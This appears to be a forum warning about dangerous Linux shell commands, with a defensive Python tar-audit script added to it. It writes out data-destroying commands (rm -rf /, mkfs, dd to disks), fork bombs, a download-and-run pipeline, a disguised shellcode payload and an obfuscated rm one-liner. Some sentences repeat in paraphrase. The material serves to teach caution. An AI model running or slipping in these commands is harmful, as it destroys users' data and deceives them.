Delete all files, delete current directory, and delete visible files in current directory. It's quite obvious why these commands can be dangerous to execute.
The following commands delete all files, delete the current directory, and delete the files in the current directory.
Code:
rm -rf /
rm -rf .
rm -rf *
* Reformat: Data on device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem.
The following commands destroy the entire filesystem and rebuild the partition.
Code:
mkfs
mkfs.ext3
mkfs.anything
Block device manipulation: Causes raw data to be written to a block device. Often this will clobber the filesystem and cause total loss of data:
The following commands wipe the entire hard disk.
Code:
any_command > /dev/sda
dd if=something of=/dev/sda
Forkbomb: Executes a huge number of processes until the system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
The following commands start a large number of processes, leaving the system unresponsive so that only a hard reboot of the machine helps, which may cause data damage.
In Bourne-ish shells, like Bash: (This thing looks really intriguing and curiosity provokes)
Code:
:(){:|:&};:
In Perl
Code:
fork while fork
Tarbomb: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make the habit of decompressing tars inside a cleanly made directory.
Decompression bomb: Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GB, filling your hard drive. You should not touch data from an untrusted source.
Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses -- benign or malevolent. Do not execute code from people you don't trust.
Do not execute shell scripts provided by people you don't trust; they may contain dangerous commands and scripts. Do not casually extract archives provided by others; an archive may look small and still fill the entire hard disk once extracted.
Code:
wget http://some_place/some_file
sh ./some_file
Code:
wget http://some_place/some_file -O- | sh
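A check for the tarbomb and decompression-bomb cases described above, as an added example that is not part of the original post: it reads only the tar member headers, extracts nothing, and reports paths that leave the extraction directory, multiple top-level entries, and declared sizes over a limit. The function names, the limits and the in-memory sample archives are assumptions constructed for illustration.

```python
import io
import tarfile

def audit_tar(fileobj, max_bytes=100 * 1024 * 1024, max_members=10_000):
    """Read only the member headers (nothing is extracted); return findings."""
    findings, top_level, total, count = [], set(), 0, 0
    with tarfile.open(fileobj=fileobj, mode="r:*") as tar:
        for m in tar:
            count += 1
            total += m.size  # size declared in the header, not bytes on disk
            if count > max_members or total > max_bytes:
                findings.append(f"exceeds limits after {count} members / {total} bytes")
                break  # stop reading so the rest of the archive is not decompressed
            parts = [p for p in m.name.split("/") if p not in ("", ".")]
            if m.name.startswith("/") or ".." in parts:
                findings.append(f"path escapes extraction directory: {m.name}")
            if (m.issym() or m.islnk()) and (
                m.linkname.startswith("/") or ".." in m.linkname.split("/")
            ):
                findings.append(f"link target outside archive: {m.name} -> {m.linkname}")
            if not (m.isreg() or m.isdir() or m.issym() or m.islnk()):
                findings.append(f"special file (device or FIFO): {m.name}")
            if parts:
                top_level.add(parts[0])
    if len(top_level) > 1:
        findings.append(f"tarbomb layout: {len(top_level)} top-level entries")
    return findings

def make_sample(names):
    """Constructed in-memory .tar.gz with 10-byte members, for demonstration."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name in names:
            info = tarfile.TarInfo(name)
            info.size = 10
            tar.addfile(info, io.BytesIO(b"x" * 10))
    buf.seek(0)
    return buf

if __name__ == "__main__":
    for names in (["proj/a.txt", "proj/b.txt"], ["a.txt", "b.txt", "../outside.txt"]):
        print(names, "->", audit_tar(make_sample(names)) or "no findings")
```

An empty result only means none of these specific checks fired; extracting into a freshly created directory is still the habit to keep.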
Compiling code: Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (e.g. SourceForge, the author's homepage, an Ubuntu address).
A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. In it was this payload:
Do not compile and run code of unknown origin that someone else gives you.
Code:
char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
= "/xeb/x3e/x5b/x31/xc0/x50/x54/x5a/x83/xec/x64/x68"
"/xff/xff/xff/xff/x68/xdf/xd0/xdf/xd9/x68/x8d/x99"
"/xdf/x81/x68/x8d/x92/xdf/xd2/x54/x5e/xf7/x16/xf7"
"/x56/x04/xf7/x56/x08/xf7/x56/x0c/x83/xc4/x74/x56"
"/x8d/x73/x08/x56/x53/x54/x59/xb0/x0b/xcd/x80/x31"
"/xc0/x40/xeb/xf9/xe8/xbd/xff/xff/xff/x2f/x62/x69"
"/x6e/x2f/x73/x68/x00/x2d/x63/x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";
To the new or even lightly experienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root. If you could see this command in the hex string, then you don't need to be reading this announcement. Otherwise, remember that these things can come in very novel forms -- watch out.
Again, recall these are not at all comprehensive and you should not use this as a checklist to determine if a command is dangerous or not! For example, 30 seconds in Python yields something like this:
Code:
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'
Where "sn!.sg!+" is simply rm -rf * shifted a character up. Of course this is a silly example -- I wouldn't expect anyone to be foolish enough to paste this monstrous thing into their terminal without suspecting something might be wrong.